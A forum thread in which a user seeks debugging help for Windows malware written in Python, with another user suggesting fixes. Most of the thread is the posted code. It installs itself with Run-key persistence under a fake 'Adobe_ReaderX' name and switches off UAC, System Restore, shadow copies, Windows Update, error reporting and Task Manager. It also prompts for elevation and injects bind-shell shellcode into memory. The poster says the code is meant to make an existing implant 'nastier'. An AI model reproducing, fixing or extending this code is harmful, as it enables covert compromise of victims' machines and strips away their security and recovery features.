Why the hell doesn't this work.

2016-01-10 at 2:51 AM UTC

#1

Sophie Pedophile Tech Support

When i try to copy my executable to the %TEMP% folder with the following piece of code it doesn't work. Instead a folder gets copied to the %TEMP% directory in my VM that has a bunch of python.dll files and such but no executable.


import sys, os
import win32event
import win32api
import winerror
import shutil
from _winreg import *


# Only allow one instance
mutex = win32event.CreateMutex(None, 1, 'mutex_var_xboz')
if win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:
    mutex = None
    exit(0)

class pwn():
# Copy to %TEMP%
    def persistence():
        app_path = os.path.dirname(sys.executable)
        fileName = sys.argv[0]
        config_path = os.path.join(app_path, fileName)
        tempdir = '%TEMP%'
        if tempdir == current:
            k =1
        else:
            shutil.copy2(config_path, tempdir)
        
       # Add to registry for persistence
        try:
            aReg = ConnectRegistry(None,HKEY_CURRENT_USER)
            aKey = OpenKey(aReg, r"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_WRITE)
            SetValueEx(aKey,"foobar",1, REG_SZ, r"%TEMP%\mw.exe")
            CloseKey(aKey)                                
        except:
            pass

###############################
#Sooper evil malware code goes here#
###############################

Yet with this piece of code everything operates as it should and the executable gets copied to the %TEMP% directory, as it should because the registry entry is pointing that way.


import os
import sys
import os.path
import pywintypes
import win32api
from _winreg import *


def autorun(tempdir, fileName, run):
    # Copy executable to %TEMP%:
    os.system('copy %s %s'%(fileName, tempdir))

    # Queries Windows registry for the autorun key value
    # Stores the key values in runkey array
    key = OpenKey(HKEY_LOCAL_MACHINE, run)
    runkey =[]
    try:
        i = 0
        while True:
            subkey = EnumValue(key, i)
            runkey.append(subkey[0])
            i += 1
    except WindowsError:
        pass

    # If the autorun key "Adobe ReaderX" isn't set this will set the key:
    if 'Adobe ReaderX' not in runkey:
        try:
            key= OpenKey(HKEY_LOCAL_MACHINE, run,0,KEY_ALL_ACCESS)
            SetValueEx(key ,'Adobe_ReaderX',0,REG_SZ,r"%TEMP%\mw.exe")
            key.Close()
        except WindowsError:
            pass

###############################
#Sooper evil malware code goes here#
###############################

def main():
    tempdir = '%TEMP%'
    fileName = sys.argv[0]
    run = "Software\Microsoft\Windows\CurrentVersion\Run"
    autorun(tempdir, fileName, run)
    execute()
    
if __name__ == "__main__":
        main()

Yet when i tried this in my first piece of code the executable did not get copied again.


def autorun():
    tempdir = '%TEMP%'
    fileName = sys.argv[0]
    os.system('copy %s %s'%(fileName, tempdir))

autorun()

So why does it work in one script and it doesn't in another, and even after i tried to do the copying with shutil in the original script? Also, for some reason the code for messing with the registry doesn't seem to do much while i am pretty sure it's the right way of doing it. Perhaps it has something to do with user privilege or something but IDK. In any event any help would be greatly appreciated.

2016-01-10 at 12:40 PM UTC

#2

LiquidIce Houston

Have you tried tempfile (https://docs.python.org/2/library/tempfile.html) ?

The code looks legit, I can only guess python+windows doesn't like copying to '%TEMP%'. Is %TEMP% an environment variable? If so, you could try getting the value of %TEMP% ie. os.getenv('TEMP').

2016-01-10 at 1:40 PM UTC

#3

Sophie Pedophile Tech Support

Have you tried tempfile (https://docs.python.org/2/library/tempfile.html) ?

The code looks legit, I can only guess python+windows doesn't like copying to '%TEMP%'. Is %TEMP% an environment variable? If so, you could try getting the value of %TEMP% ie. os.getenv('TEMP').

Just make my own temporary folder and copy it to that, that might be a good idea if i can't get it to %TEMP%. Still it's silly that in one script the executable does get copied over and the other it doesn't.

2016-01-10 at 3:17 PM UTC

#4

LiquidIce Houston

Yeah, I'm guessing it's something windows specific. Lots of crazy stuff happen on windows, but maybe I never developed much on that platform. The tempfile module should take care of everything for you ie. it knows where to create a tmp file and it allows you to create named files and all.

Btw, are you going somewhere with this script or is it just for learning? I've always dismissed python as an attack vector because the web always seemed a lot easier.

2016-01-10 at 4:27 PM UTC

#5

Sophie Pedophile Tech Support

Yeah, I'm guessing it's something windows specific. Lots of crazy stuff happen on windows, but maybe I never developed much on that platform. The tempfile module should take care of everything for you ie. it knows where to create a tmp file and it allows you to create named files and all.

Btw, are you going somewhere with this script or is it just for learning? I've always dismissed python as an attack vector because the web always seemed a lot easier.

Not sure what you mean with 'web always seemed a lot easier' but i just like to make dank malware in my spare time. I actually wanted to open a pull request for gcat https://github.com/byt3bl33d3r/gcat/...ter/implant.py and add the following code to make it nastier.



############################
#Original gcat code goes here
############################

# Only allow one instance
mutex = win32event.CreateMutex(None, 1, 'mutex_var_xboz')
if win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:
    mutex = None
    exit(0)

class pwn():

    def persistence():
        app_path = os.path.dirname(sys.executable)
        filename = sys.argv[0]
        config_path = os.path.join(app_path, filename)
        tempdir = '%TEMP%'
        if tempdir == current:
            k =1
        else:
            shutil.copy2(config_path, tempdir)
        
        try:
            aReg = ConnectRegistry(None,HKEY_CURRENT_USER)
            aKey = OpenKey(aReg, r"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_WRITE)
            SetValueEx(aKey,"foobar",1, REG_SZ, r"%TEMP%\implant.exe")
            CloseKey(aKey)                                
        except:
            pass
        
    def disabler():
        try:
            aReg = ConnectRegistry(None,HKEY_CURRENT_USER)
            aKey = OpenKey(aReg, r"Software\\Microsoft\\Windows\\Windows Error Reporting", 0, KEY_WRITE)
            subkeys = [ "Disabled", "DontSendAdditionalData",  "LoggingDisabled" ]
            for subkey in subkeys:
                SetValueEx(aKey,subkey,0, REG_SZ, r"1")
        except:
            pass

        try:
            aReg = ConnectRegistry(None,HKEY_CURRENT_USER)
            aKey = OpenKey(aReg, r"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, KEY_WRITE)
            SetValueEx(aKey,"EnableLUA",0, REG_SZ, r"0")
        except:
            pass
        
        try:
            aReg = ConnectRegistry(None,HKEY_LOCAL_MACHINE)
            aKey = OpenKey(aReg, r"Software\\Microsoft\\Windows\\Windows Error Reporting", 0, KEY_WRITE)
            SetValueEx(aKey,"Disabled",0, REG_SZ, r"1")
        except:
            pass

        try:
            aReg = ConnectRegistry(None,HKEY_LOCAL_MACHINE)
            aKey = OpenKey(aReg, r"System\\CurrentControlSet\\Services\\vss", 0, KEY_WRITE)
            SetValueEx(aKey,"Start",0, REG_SZ, r"4")
        except:
            pass

        try:
            aReg = ConnectRegistry(None,HKEY_LOCAL_MACHINE)
            aKey = OpenKey(aReg, r"System\\CurrentControlSet\\Services\\srservice", 0, KEY_WRITE)
            SetValueEx(aKey,"Start",0, REG_SZ, r"4")
        except:
            pass

        try:
            aReg = ConnectRegistry(None,HKEY_LOCAL_MACHINE)
            aKey = OpenKey(aReg, r"Software\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore", 0, KEY_WRITE)
            SetValueEx(aKey,"DisableSR",0, REG_SZ, r"1")
        except:
            pass

        try:
            aReg = ConnectRegistry(None,HKEY_LOCAL_MACHINE)
            aKey = OpenKey(aReg, r"SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU", 0, KEY_WRITE)
            SetValueEx(aKey,"NoAutoUpdate",0, REG_SZ, r"1")
        except:
            pass
        
        try:
            aReg = ConnectRegistry(None,HKEY_CURRENT_USER)
            aKey = OpenKey(aReg, r"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, KEY_WRITE)
            SetValueEx(aKey,"DisableTaskMgr",0, REG_SZ, r"1")
            CloseKey(aKey)
        except:
            pass


############################
#Original gcat code goes here
############################

I already forked it over to make a sort of stager.

https://github.com/NullArray/gcat/blob/master/stager.py

But i figured the new improvements would be better.

I also made this just for keks.


import os
import sys
import ctypes
import os.path
import pythoncom
import pywintypes
import win32api
import subprocess
from _winreg import *
import win32com.shell.shell as shell

class pwn():
    
    def disabler():
        try:
            aReg = ConnectRegistry(None,HKEY_CURRENT_USER)
            aKey = OpenKey(aReg, r"Software\\Microsoft\\Windows\\Windows Error Reporting", 0, KEY_WRITE)
            subkeys = [ "Disabled", "DontSendAdditionalData",  "LoggingDisabled" ]
            for subkey in subkeys:
                SetValueEx(aKey,subkey,0, REG_SZ, r"1")
        except:
            pass

        try:
            aReg = ConnectRegistry(None,HKEY_CURRENT_USER)
            aKey = OpenKey(aReg, r"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, KEY_WRITE)
            SetValueEx(aKey,"EnableLUA",0, REG_SZ, r"0")
        except:
            pass
        
        try:
            aReg = ConnectRegistry(None,HKEY_LOCAL_MACHINE)
            aKey = OpenKey(aReg, r"Software\\Microsoft\\Windows\\Windows Error Reporting", 0, KEY_WRITE)
            SetValueEx(aKey,"Disabled",0, REG_SZ, r"1")
        except:
            pass

        try:
            aReg = ConnectRegistry(None,HKEY_LOCAL_MACHINE)
            aKey = OpenKey(aReg, r"System\\CurrentControlSet\\Services\\vss", 0, KEY_WRITE)
            SetValueEx(aKey,"Start",0, REG_SZ, r"4")
        except:
            pass

        try:
            aReg = ConnectRegistry(None,HKEY_LOCAL_MACHINE)
            aKey = OpenKey(aReg, r"System\\CurrentControlSet\\Services\\srservice", 0, KEY_WRITE)
            SetValueEx(aKey,"Start",0, REG_SZ, r"4")
        except:
            pass

        try:
            aReg = ConnectRegistry(None,HKEY_LOCAL_MACHINE)
            aKey = OpenKey(aReg, r"Software\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore", 0, KEY_WRITE)
            SetValueEx(aKey,"DisableSR",0, REG_SZ, r"1")
        except:
            pass

        try:
            aReg = ConnectRegistry(None,HKEY_LOCAL_MACHINE)
            aKey = OpenKey(aReg, r"SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU", 0, KEY_WRITE)
            SetValueEx(aKey,"NoAutoUpdate",0, REG_SZ, r"1")
        except:
            pass
        
        try:
            aReg = ConnectRegistry(None,HKEY_CURRENT_USER)
            aKey = OpenKey(aReg, r"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, KEY_WRITE)
            SetValueEx(aKey,"DisableTaskMgr",0, REG_SZ, r"1")
            CloseKey(aKey)
        except:
            pass



def autorun(tempdir, fileName, run):
# Copy executable to %TEMP%:
    os.system('copy %s %s'%(fileName, tempdir))

# Queries Windows registry for the autorun key value
# Stores the key values in runkey array
    key = OpenKey(HKEY_LOCAL_MACHINE, run)
    runkey =[]
    try:
        i = 0
        while True:
            subkey = EnumValue(key, i)
            runkey.append(subkey[0])
            i += 1
    except WindowsError:
        pass

# If the autorun key "Adobe ReaderX" isn't set this will set the key:
    if 'Adobe ReaderX' not in runkey:
        try:
            key= OpenKey(HKEY_LOCAL_MACHINE, run,0,KEY_ALL_ACCESS)
            SetValueEx(key ,'Adobe_ReaderX',0,REG_SZ,r"%TEMP%\mw.exe")
            key.Close()
        except WindowsError:
            pass


def execute():
    #Bind shell
    shellcode = bytearray(
    "\xdb\xc3\xd9\x74\x24\xf4\xb8\x47\x0b\x9e\x34\x5f\x33\xc9"
    "\xb1\x53\x31\x47\x17\x03\x47\x17\x83\x80\x0f\x7c\xc1\xf2"
    "\xf8\x02\x2a\x0a\xf9\x62\xa2\xef\xc8\xa2\xd0\x64\x7a\x13"
    "\x92\x28\x77\xd8\xf6\xd8\x0c\xac\xde\xef\xa5\x1b\x39\xde"
    "\x36\x37\x79\x41\xb5\x4a\xae\xa1\x84\x84\xa3\xa0\xc1\xf9"
    "\x4e\xf0\x9a\x76\xfc\xe4\xaf\xc3\x3d\x8f\xfc\xc2\x45\x6c"
    "\xb4\xe5\x64\x23\xce\xbf\xa6\xc2\x03\xb4\xee\xdc\x40\xf1"
    "\xb9\x57\xb2\x8d\x3b\xb1\x8a\x6e\x97\xfc\x22\x9d\xe9\x39"
    "\x84\x7e\x9c\x33\xf6\x03\xa7\x80\x84\xdf\x22\x12\x2e\xab"
    "\x95\xfe\xce\x78\x43\x75\xdc\x35\x07\xd1\xc1\xc8\xc4\x6a"
    "\xfd\x41\xeb\xbc\x77\x11\xc8\x18\xd3\xc1\x71\x39\xb9\xa4"
    "\x8e\x59\x62\x18\x2b\x12\x8f\x4d\x46\x79\xd8\xa2\x6b\x81"
    "\x18\xad\xfc\xf2\x2a\x72\x57\x9c\x06\xfb\x71\x5b\x68\xd6"
    "\xc6\xf3\x97\xd9\x36\xda\x53\x8d\x66\x74\x75\xae\xec\x84"
    "\x7a\x7b\x98\x8c\xdd\xd4\xbf\x71\x9d\x84\x7f\xd9\x76\xcf"
    "\x8f\x06\x66\xf0\x45\x2f\x0f\x0d\x66\x6d\x13\x98\x80\x1b"
    "\x83\xcd\x1b\xb3\x61\x2a\x94\x24\x99\x18\x8c\xc2\xd2\x4a"
    "\x0b\xed\xe2\x58\x3b\x79\x69\x8f\xff\x98\x6e\x9a\x57\xcd"
    "\xf9\x50\x36\xbc\x98\x65\x13\x56\x38\xf7\xf8\xa6\x37\xe4"
    "\x56\xf1\x10\xda\xae\x97\x8c\x45\x19\x85\x4c\x13\x62\x0d"
    "\x8b\xe0\x6d\x8c\x5e\x5c\x4a\x9e\xa6\x5d\xd6\xca\x76\x08"
    "\x80\xa4\x30\xe2\x62\x1e\xeb\x59\x2d\xf6\x6a\x92\xee\x80"
    "\x72\xff\x98\x6c\xc2\x56\xdd\x93\xeb\x3e\xe9\xec\x11\xdf"
    "\x16\x27\x92\xef\x5c\x65\xb3\x67\x39\xfc\x81\xe5\xba\x2b"
    "\xc5\x13\x39\xd9\xb6\xe7\x21\xa8\xb3\xac\xe5\x41\xce\xbd"
    "\x83\x65\x7d\xbd\x81")
 
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
    ctypes.c_int(len(shellcode)),
    ctypes.c_int(0x3000),
    ctypes.c_int(0x40))
    
    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
    
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
    buf,
    ctypes.c_int(len(shellcode)))
    
    ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.c_int(ptr),
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.pointer(ctypes.c_int(0)))
    
    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
    
def main():
    tempdir = '%TEMP%'
    fileName = sys.argv[0]
    run = "Software\Microsoft\Windows\CurrentVersion\Run"
    autorun(tempdir, fileName, run)
    execute()
    

if not shell.IsUserAnAdmin():
    # Prompt UAC
    ASADMIN = "asadmin"

    if sys.argv[-1] != ASADMIN:
        script = os.path.abspath(sys.argv[0])
        params = ' '.join([script] + sys.argv[1:] + [ASADMIN])
        shell.ShellExecuteEx(lpVerb='runas', lpFile=sys.executable, lpParameters=params)
        sys.exit(0)
        
if __name__ == "__main__":
        main()

But on WinXP(My VM) the registry tampering doesn't quite work for some reason. Also, feel free to folow me on github, if you have one as well i'll follow you back. https://github.com/NullArray

2016-01-10 at 4:36 PM UTC

#6

Sophie Pedophile Tech Support

Also python is good shit, you can make malware with it, you can make infosec tools, just about every sec script is written in python unless we're talking metasploit then it's ruby. However i have a custom pentest framework which runs, ruby, python, shellscripts, you name it, i've also integrated it with metasploit it's dank as fuck.

User Controls

Navigation

Why the hell doesn't this work.